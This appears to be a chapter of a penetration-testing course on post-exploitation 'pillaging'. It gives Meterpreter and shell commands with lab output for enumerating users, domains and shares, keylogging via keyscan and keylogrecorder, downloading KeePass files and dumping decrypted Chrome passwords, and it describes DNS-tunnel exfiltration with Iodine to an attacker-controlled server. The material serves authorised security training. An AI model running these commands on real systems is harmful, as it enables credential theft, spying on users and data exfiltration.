Pillaging / Data Harvesting

6.3. Pillaging / Data Harvesting

Once we have built our way into the victim machine, we can move on to the next phase: Data Harvesting / Pillaging.

Pillaging is the step in which you access sensitive data and intellectual property of the target organization.

Demonstrating the feasibility of an external hacker accessing this information might be the goal of the overall engagement, so this phase is critical.

However, according to the type of machine you have compromised, you may or may not find what you are looking for. This presents the need to further exploit and infiltrate the network.

Therefore in this step we will also harvest data and information necessary for this purpose.

This encompasses getting local information such as files, enumerating credentials, accounts, IM logs, and more, but also network information such as internal network blocks in use, domains, intranet servers, shared hard drives, printers, repositories, and so on.

Network information will also be used in the Mapping the internal network phase.

Important Since there is an infinite list of commands that we can run on the target machines, we will not list all of them here. Instead, we will see the most important and then we will give you some references at the end of this section.

The important thing to remember here is that we need to get as much [information][http://www.pentest-standard.org/index.php/Post_Exploitation#Pillaging] as we can: system info, applications, services, networks, documents, messaging, and so on.

In the next sections we will see a list of scripts and commands related to data harvesting, that a penetration testers could use through a meterpreter session or shell.

Notice that we have already seen some of these scripts in previous phases, but for different purposes. We will still mention them here since they are very important for the success of this step.

Let us start harvesting basic information about the system.

• sysinfo With sysinfo command we are able to get basic information about the remote system. Notice that the script works both on Windows and Linux OS.

  meterpreter > sysinfo
  Computer        : ELS
  OS              : Windows 7 (Build 7601, Service Pack 1)
  Architecture    : x64 (Current Process is WOW64)
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/win32

• getuid With getuid, we can check the user that we are running as on the target machine.

  meterpreter > getuid
  Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000

  meterpreter > getuid
  Server username: els\els

Starting from this information, we can already start making assumption about the role of the victim machine.

For example, if the previous command show us that the victim machine is a server, one of the most important things to check is which services are running on it.

In other words, we have to figure out the role of the machine in the remote network.

You should try to get answers to questions like:

• Is this a workstation?

  • Which department is it from?

    • R&D?

    • Marketing?

    • ...

• Is this a server?

  • What server?

    • Mail server?

    • Web server?

    • RADIUS?

    • ...

During the Pillaging step, we should be able to give an accurate answer to those questions according to the information we get on the system.

Let us start uncovering some of the commands we can run to collect more information.

Metasploit already implements some enumeration scripts that could be used for this purpose: - run /post/windows/gather/ Result: meterpreter > run post/windows/gather/ Display all 106 possibilites? (y or n) run post/windows/gather/arp_scanner run post/windows/gather/bitcoin_jacker run post/windows/gather/cachedump run post/windows/gather/checkvm - run /post/linux/gather/ Result: run post/windows/gather/arp_scanner run post/windows/gather/bitcoin_jacker run post/windows/gather/cachedump run post/windows/gather/checkvm

Notice that the previous scripts contain predefined sets of shell commands that will be run on the target machine in order to get the correct information. (see img-195?)

Although they are very useful and will save us a lot of time, we can use Windows or Unix commands from an interactive shell in order to get the same results. For example, let us first run the enum_services scripts and then check how we can get similar results from a shell. ``` [*] Listing Services Info for matching services, please wait... [+] New service credentials detected: AeLookupSvc is running as `` [+] New service credentials detected: ALG is running as 'NT AUTHORITY\LocalService' [+] New service credentials detected: aspnet_state is running as 'NT AUTHORITY\NetworkService' Services ========

Name         Credentials                 Command   Startup
----         -----------                 -------   -------
ALD          NT AUTHORITY\LocalService   Manual    C:\Windows\System32\alg.exe
AeLookupSvc  localSystem                 Manual    C:\Windows\System32\svchost.exe         
ApoIDSvc     NT Authority\LocalService   Manual     C:\Windows\System32\svchost.exe
```

As you can see, with a single command we het a list of all services on the remote machine, the user associated with each of them, the startup type, and also the path to the binary.
The same information can be obtained on the machine, by opening the *Services* configuration windows (see img-197).

Important It is important to know that many post exploitation scripts are implemented as modules and can be used outside the meterpreter session.

We just need to select the module with the `use` command, configure its options with `set`, and then execute the module with `run`.

Let us see an example based on `enum_services`.

We will get the same results obtained before, but we can also configure the module according to our needs.
  ```
  msf > use/post/windows/gather/enum_services
  msf post(enum_services) > show options

      Name      Current Setting   Required  Description
      ----      ---------------   --------  -----------
      CRED                        no        String to search credentials for
      PATH                        no        String to search path for
      SESSION   2                 yes       The session to run this module on
      TYPE      All               yes       Service startup Option (Accepted: All, Auto, Manual, Disabled)

  msf post(enum_services) > run
  ```

As we said before, post exploitation scripts and modules usually contain and execute a well-defined set of OS commands. In other words, we can get similar information by running the correct commands from a shell terminal on the target machine.

• wmic In the previous case we can get services information with the wmic command. As we can see we get similar information. Example:

  C:\Users\els\Downloads>wmic service get Caption,StartName,State,pathName
  wmic service get Caption,StartName,State,pathname
  Caption                            StartName                  State     PathName
  Application Experience             localSystem                Running   C:\Windows\system32\svchost.exe -k netsvcs
  Application Layer Gateway Service  NT AUTHORITY\LocalService  Stopped   C:\Windows\system32\alg.exe
  Application Identity               NT Authority\LocalService  Stopped   C:\Windows\system32\svchost.exe -k LocalServcieAndNoImpersonation

• net start Another useful command that we can use to list services that are currently running is net start. Inspecting the results of these commands gives us a better idea of the machine role. Inspecting the results of these commands gives us a better idea of the machine role. For example, services like DNS or IIS tell us that the exploited machine have a server role.

  C:\Windows\system32> net start
  net start
  These Windows services are started:
  
    Application Experience
    Application Information
    Background Intelligent Transfer Service
    Base Filtering Service
    ...
    Remote Desktop Configuration
    Remote Desktop Services
    Remote Desktop Services UserMode Port Redirector

• service --status-all As you can imagine, these commands rely on the OS we are dealing with. For example if we want a list of services running on the exploited Linux machine, we will run service --status-all

  Example:

  meterpreter > shell
  Process 9852 created.
  Channel 1 created.
  $ service --status-all
    [+] acpid
    [-] anacron
    [+] apache

• ps In addition to services running on the machine, listing running process could also be very useful to understand the role of the machine. The easiest way to check them is by running the ps command on the meterpreter.

Some critical information to retrieve in a Windows networked environment, is if the compromised machine is part of a domain, or even, if it is a domain controller.

• net view/domain To gather this information we can run the command net view/domain or run the script named enum_domains.

  Here is an example of what we may get. In this case the machine is in the domain ELSLAB and we also know the name of the Domain Controller.

  C:\Users\els\Downloads>net view /domain
  net view /domain
  Domain
  
  -----------------------------------------------------------------------------
  ELSLAB
  The command completed successfully.
  
  
  C:\Users\els\Downloads>^C
  Terminate channel 2? [y/N]   y
  meterpreter > run post/windows/gather/enum_domains
  
  [*] Enumerating DCs for ELSLAB
  [+] Domain Controller: WIN-2QH87UNDLTR

• net group "Domain Controllers" /domain We can also print the list of Domain Controllers with the following command:

  C:\Windows\system32>net group "Domain Controllers" /domain
  net group "Domain Controllers" /domain
  
  Group name      Domain Controllers                      Members
  Comment         All domain controllers in the domain
  
  ----------------------------------------------------------------------------
  WIN-2QH87UNDLTR$
  The command completed successfully.

Let us now focus on which command we can use to get information about users.

• net user (Windows) and cat /etc/passwd (Linux) With these commands we are able to list users on the system.

  C:\Windows\system32>net user
  net user
  
  User accounts for \\
  
  -----------------------------------------------------------------------------
  Administrator         els                     els_user
  EveUser               Guest                   stduser
  user                  
  The command completed with one or more errors.

  # cat /etc/passwd
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  bin:x:2:2:bin:/bin:/usr/sbin/nologin
  sys:x:3:3:sys:/dev:/sbin/nologin

• run post/windows/gather/enum_ad_users Notice that since the Windows machine is part of a domain, we can also use meterpreter scripts to enumerate accounts and other information in the default active domain:

  meterpreter > run post/windows/gather/enum_ad_users
  
  Domain Users
  ============
  
    sAMAccountName   name           userPrincipalName   userAccountControl  lockoutTime   mail    primarygroupid
    --------------   ----           -----------------   ------------------  -----------   ----    --------------
    Administrator    Administrator                      512                                       513
    Guest            Guest                              66082                                     514

• net user /domain Similar information can be obtained with the net user /domain command. Remember that most of the scripts automate and organize information that can be gathered with shell commands.

  C:\Windows\system32>net user /domain
  net user /domain
  The request will be processed at a domain controller for domain eLSLab.local.
  
  
  User accounts for \\WIN-2QH87UNDLTR.eLSLab.local
  
  ----------------------------------------------------------------------------
  Administrator         Francesco       Guest         krbgt
  
  The command completed with one or more errors.

• net localgroup Moreover we can check which groups exist on the machine or which users are within a group with the net localgroup [group_name] command.

  C:\Usrs\els\Downloads>net localgroup
  net localgroup
  
  Aliases for \\ELS
  
  ----------------------------------------------------------------------------
  *Administrators
  *Backup Operators
  *Cryptographic Operators
  *Distributed COM Users

  C:\Usrs\els\Downloads>net localgroup Administrators
  net localgroup Administrators
  Alias name     Administrators
  Comment        Administrators have completed and unresticted
  
  Members
  
  ----------------------------------------------------------------------------
  *Administrators
  *Backup Operators
  *Cryptographic Operators
  *Distributed COM Users

• net share and enum_shares The last command we will see is useful to display all the resources shared on the victim.

  We can use net share from the command prompt or enum_share from meterpreter.

  C:\Users\els\Downloads>net share
  net share
  
  Share name      Resource                      Remark
  ----------      --------                      ------
  C$              C:\                           Default share
  IPC$                                          Remote IPC
  ADMIN$          C:\Windows                    Remote Admin
  test            C:\Users\els\Documents\test
  Users           C:\Users
  The command completed successfully

  meterpreter > run enum_shares
  [*]
  [*] The following shares were found:
  [*]     Name: test
  [*]     Path: C:\Users\els\Documents\test
  [*]     Type: 0
  [*]
  [*]     Name: Users
  [*]     Path: C:\Users
  [*]     Type:0
  [*]
  [*] Recent UNC paths entered in Run Dialog found:
  [*]     \\192.168.102.147\1

The list of commands in this section is just a small fraction of the ones that are available in Meterpreter or in the OS shells.

For example we did not yet gather networking information such as IP addresses, ARP tables, DNS, current connections, and so on. In addition to this information, we also still need to check installed applications and local files.

as you have already seen, you have a number of different commands and methods to retrieve information, depending on the victim OS.

Showing all of them is merely impossible, but fellow pentesters have shared a few documents with us listing all potential commands for:

• [Windows][https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit?hl=en_US]

• [Linux][https://docs.google.com/document/d/1ObQB6hmVvRPCgPTRZM5NMH034VDM-1N-EWPRz2770K4/edit?hl=en_US]

• [OSX][https://docs.google.com/document/d/10AUm_zUdAQGgoHNo_eS0SO1K-24VVYnulUD2x3rJD3k/edit?hl=en_US]

• [Metasploit][https://docs.google.com/document/d/1ZrDJMQkrp_YbU_9Ni9wMNF2m3nIPEA_kekqqqA2Ywto/edit?pref=2&pli=1].

At the following [link][https://github.com/mubix/post-exploitation-wiki] you can find a few more links containing post-exploitation commands. You can also download them locally and access it from a web browser.

Notice that there are many other lists available online. [Here][http://tim3warri0r.blogspot.it/] and [Here][https://n0where.net/linux-post-exploitation/] you can find a few more commands to run on Windows and Linux/Unix/BSD machine.

We strongly suggest you take a look at these documents in order to understand what type of commands and information you may need to gather from exploited machines.

Before seeing how to harvest files from the victim, it is useful to know that Metasploit implements scripts that automatically retrieve information from the system. The two main scripts that we can use against Windows machines are

• scraper harvests system info including network shares, registry hives, and password hashes

• winenum retrieves all kinds of information about the system including environment variables, network interfaces routing, user accounts, and much more.

If we inspect the code of these 2 scripts, we can see the list of commands that they will run on the remote machine (see img-218)

Notice that they will automatically save all information gathered into local files, so we can inspect them later. meterpreter > run winenum [*] Running Windows Local Enumeration Meterpreter Script [*] New session on 192.168.102.157:47451... [*] Saving general report to /root/.msf5/logs/scripts/winenum/ELS_20160303.5433/ELS_20160303.5433.txt [*] Checking if ELS is a Virtual Machine ........ [*] This is a VMware Workstation/Fusion Virtual Machine [*] UAC is Disabled [*] Running Command List ... [*] running command arp -a [*] running command cmd.exe /c set [*] running command ipconfig /all

Once we have information about the system, networks, users, groups, services, and so on, we can start getting not only actual files and documents, but also keystrokes. We will look for usernames, passwords, IM logs, private documents, and so on.

Metasploit offers some great scripts that could be used in this step. For example with screenshoot command we are able to get the screen of the victim. (see img-221)

Another way to get sensitive information from the target machine is by running a keylogger. Although there are many keylogger tools that we can use and install on the remote machine, Metasploit also offers a few scripts to do this: keyscan_start and keylogrecorder

It is important to know that depending on the privileges we have on the remote machine and the process we are attached to, different keystrokes can be logged.

For example, if we want to log credentials typed when the user unlocks the screen we will have to attach the session to the `winlogon.exe` process (which runs on SYSTEM).

On the other side, if we want to dump keystrokes while the user uses applications and so on, we will have to attach the process `explorer.exe` (which runs on user level).

Let us see how the 2 script works:

• keyscan_start, keystart_dump, winlogon.exe The first script we are going to use is keystart_scan. Notice that we already migrated in explorer.exe

  meterpreter > getpid
  Current pid: 3012
  meterpreter > keyscan_start
  Starting the keystroke sniffer...
  meterpreter >

  Once the sniffer is running we just have to wait for the user to type something on the keyboard.

  Notice that the keystrokes will not be automatically printed on the screen. Instead we have to run keyscan_dump to see them.

  meterpreter > keyscan_dump
  Dumping captured keystrokes...
  bank of america <Return> elstarget <Tab> MyStringPwd23454_ <Return>

  As we can see, it seems the user typed bank of america and then some credentials. While the sniffer is running, we can dump the keystrokes by simply executing keyscan_dump. To stop the sniffer we just need to run keyscan_stop

  Let's now migrate to winlogon.exe and try to dump the user login credentials.

  PID   PPID  Name          Arch  Session   User                  Path
  ---   ----  ----          ----  -------   ----                  ----
  500   412   winlogon.exe  x64   1         NT AUTHORITY\SYSTEM   C:\Windows\syst
  
  meterpreter > getpid
  Current pid: 500
  meterpreter > keyscan_start
  Starting the keystroke sniffer...
  meterpreter > keyscan_dump
  Dumping captured keystrokes...
  
  meterpreter > keyscan_dump
  Dumping captured keystrokes...
  
  meterpreter > keyscan_dump
  Dumping captured keystrokes...
   <Ctrl>  <LCtrl>  <Insert>  <Ctrl>  <LCtrl>  <Alt>  <LMenu>  <Delete> els <Return>
  meterpreter >

• keylogrecorder The next script we want to use is keylogrecorder:

  meterpreter > run keylogrecorder -h
  Keylogger Recorder Meterpreter Script
  This script will start the Meterpreter Keylogger and save all keys in a log file for later analysis. To stop capture hit Ctrl-C
  Usage:
  OPTIONS:
  
    -c <opt>  Type of key capture. (0) for user key presses, (1) for winlogon credential capture, or (2) for no migration. Default is 2.
    -h        Help menu
    -k        Kill old Process
    -l        Lock screen when capturing Winlogon credentials
    -t <opt>  Time interval in seconds between recollection of keystrokes, default 30 seconds

  As we can see, with the -c option we can instruct the script which type of key to capture (user or winlogon)

  Different form previous script, keylogrecorder automatically migrates to the correct process, but it also stores all the keystrokes into a local file.

  meterpreter > run keylogrecorder -c 0
  [*]     explorer.exe Process found, migrating into 3012
  [*] Migration Successful!!
  [*] Starting the keystroke sniffer...
  [*] Keystrokes being saved in to /root/.msf5/logs/scripts/keylogrecorder/192.168.102.157_20160303.4055.txt
  [*] Recording

  In order to see the keystrokes we just need to open the file stored in the Metasploit logs folder.

Now let's see a few commands that allows us to list files, create files, folders, move between directories, and so on. From the meterpreter help manual we can see the list of commands that are implemented. ``` Stdapi: File system Commands ============================

  Command         Description
  -------         -----------
  cat             Read the contents of a file to the screen
  cd              Change directory
  download        Download a file or directory
  edit            Edit a file
  getlwd          Print local working directory
  getwd           Print working directory
  ...
```

It does not matter the OS of the exploited machine. These commands work the same way. For example, with the commands pwd and getwd we are able to get the working directory and then we could list files.

Thanks to these commands (`search`, `download`, etc) we are able to search and download files like Web Browser cache, IM logs, documents, email files, PGP keys, specific program files like KeePass databases, and so on.

Let's suppose we want to search for a specific file extension such as KeePass database file. We can do this with the following command: search -d C:\\Users\\els\\ -f *.kdbx Description: - -d is the path where to begin searching from - -f is the file pattern to search

Once we have located the file we need, we can download it to our machine with the command download. We can use this command to retrieve all the files we need. For example we can search for IM logs like Skype, Windows Live Messenger, software configuration files such as FTP clients, SVN clients, and so on, and then download the files locally in order to inspect them.

As you can imagine, the kind of files to retrieve differs from victim to victim: web browser history is a good place to look, since you can find internal corporate network information.

Once we have downloaded and analyzed files on the remote file system, we can move on with our investigation and start searching for credentials stored on the system. We can use Metasploit modules or use third party software ([Nirsoft][http://www.nirsoft.net/] has many of these tools for windows)

  The modules that Metasploit offers can be found in the `post/windows/gather/credentials` path:
    ```
    meterpreter > run post/windows/gather/credentials/
    run post/windows/gather/credentials/bulletproof_ftp
    run post/windows/gather/credentials/coreftp
    run post/windows/gather/credentials/credential_collector
    ...
    ```

Besides scripts stored in the credentials folder, it is always useful to give a look to the scripts stored in the parent path.
  - `enum_chrome`
    For example the `enum_chrome` script can be used tot gather credentials stored in Google Chrome.
      ```
      meterpreter > run post/windows/gather/enum_chrome

      [*] Running as user 'els\els' ...
      [*] Extracting data for user 'els' ...
      ...
      ```

    At the end of the output we can see that the script was able to decrypt the data. If we inspect the file created, we will see the plain-text credentials stored in it:
      ```
      [*] => Google Now
      [*] Decrypted data saved in: /root/.msf5/loot/201603033113839_default_192.168.102.157_chrome.decrypted_412961.txt
      ```
      |  <br>
      V
      ```
      stduser@les:~$ cat /root/.msf5/loot/201603033113839_default_192.168.102.157_chrome.decrypted_412961.txt
      Decrypted data
      ==============

        Name                 Decrypted Data         Origin
        ----                 --------------         ------
        elstarget@gmail.com   Vbk19jlaDry9AgfgAY    https://accounts.google.com/ServiceLoginAuth
      ```
  - `multi`
    Notice that other gathering scripts are available under the path `post/multi/gather`
      ```
      meterpreter > run post/multi/gather
      run post/multi/gather/apple_ios_backup
      run post/multi/gather/check_malware
      run post/multi/gather/dbvis_enum
      run post/multi/gather/dns_bruteforce
      ...
      ```

• enum_application As you can imagine, knowing what software is installed on the machine is important. As you already know, we can list them with the enum_application script:

  meterpreter > run post/windows/gather/enum_applications
  
  [*] Enumerating applications installed on ELS
  
  Installed Applications
  ======================
  
    Name                                          Version
    ----                                          -------
    Apple Software Update                         2.1.3.127
    Apple Software Update                         2.1.3.127
    GnuWin32: Grep-2.5.4                          2.5.4
    GnuWin32: Grep-2.5.4                          2.5.4
    Google Chrome                                 48.0.2564.116
    Google Chrome                                 48.0.2564.116
    ...

Instead of using meterpreter scripts, we could also use external tools. In our lab environment, we will use the Web Browser Pass View tool to extract credentials saved in the web browser installed on the target machine.

As you can imagine the task to perform, the commands, the tools, and the paths to check, strongly depends on the OS you are pentesting.

Moreover, the role of the victim machine on the remote network will suggest what to look for. (see vid-242) In the following video we will see how to use the previous commands in order to gather as much information as we can from the target machine.

In our case we will gather them from an employee workstation, so we will try to get system, user, network information, installed applications, account credentials, IM logs, and so on.

6.3.1. Exfiltration over DNS with Iodine (DNS Tunnelling)

Most of the time, with real world-attacks the objective of malicious actors is not only compromise systems for use of nefarious purposes, but it also often their objective to exfiltrate sensitive information, and a lot of the time, they do so over protocols that are not typically monitored.

One method that has been increasingly seen in the wild is the use of DNS for data exfiltration, also known as "DNS Tunneling".

This is a popular method due to the fact that many organizations are not logging or alerting on anomalous DNS traffic which makes it a go-to vector for exfiltrating data out of the target network, and over often under-monitored "channel".

One tool that can be used for this purpose is known as "Iodine".

Not only iodine can help with exfiltrating data from a target environment, but it can also help in penetration testing engagements that restrict access to the internet due to authenticated proxies for which we don't have credentials, or can also be used for bypassing captive portals, such as seen commonly in wireless networks.

In a typical scenario with DNS Tunneling, the attacker DNS tunnel client component initiates a connection to the attacker-controlled DNS tunnel server component through an organization's DNS server, and can be generalized with the diagram below (see img-248): Attacker-----------DNS Tunnel--------------Attacker-Controlled (DNS Tunnel Client Component) (DNS Tunnel Server Component) | ^ | | ----------> FooCorp DNS Server-------------------

Once the DNS tunnel is established, the client transmits all network traffic, encoded, and in the form of DNS queries, typically as [TXT][https://en.wikipedia.org/wiki/TXT_record] records, through the tunnel, which is then decoded at the other end by the server component or attacker-controlled "DNS Server".

Information regarding exactly how this works, can be found [here](http://beta.ivc.no/wiki/index.php/DNS_Tunneling).

From there, we can trivially tunnel all of our traffic through an SSH socks server, completely over DNS, bypassing firewalls or any authenticated proxies along the way.

Some pre-requisites for using Iodine to create a DNS tunnel for exfiltration are: 1. Control over a domain name that you own and its DNS configuration, and; 2. An IP address to act as the authoritative Name Server for your domain name for which you have SSH access to as well

Since DNS Tunneling requires a client/server model, you'll want those 2 pieces in place in order to experiment with this method.

In the video we'll show how we can configure a DNS tunneling implementation with Iodine using a domain name we have registered with GoDaddy, in addition to using IP address hosted on a VPS provider to act our exfiltration tunnel endpoint.

(see vid-253)